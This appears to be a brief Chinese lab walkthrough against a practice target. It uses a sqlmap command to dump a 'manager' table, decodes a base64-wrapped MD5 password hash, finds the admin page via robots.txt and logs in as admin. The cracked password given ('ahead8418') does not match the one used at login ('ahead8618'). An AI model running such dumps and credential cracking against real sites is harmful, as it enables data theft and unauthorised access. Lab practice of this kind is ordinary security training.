sqlmap详情见上篇《sqlmap安装及简单使用实例》
1.靶机目标:
2.同一靶机上篇《sqlmap安装及简单使用实例》中已经找到库:rjxy和表:manager。打开 sqlmap ,通过命令 python sqlmap.py -u “url” --dump -T “manager” -D “rjxy" 找到目标密码
3.目标密码为:ZGM2M2VlMmUyYTE2M2QONmE3MGFiNDRhNzUxYzBkMjA=
用base64解密为:
dc63ee2e2a163d46a70ab44a751c0d20
再用MD5解码为:
ahead8418
最终完成解密
4.在靶机ip地址后输入robots.txt找到admins
5.进入靶机管理员页面
输入找到的
用户名:admin
密码:ahead8618
6.成功进入靶机管理员页面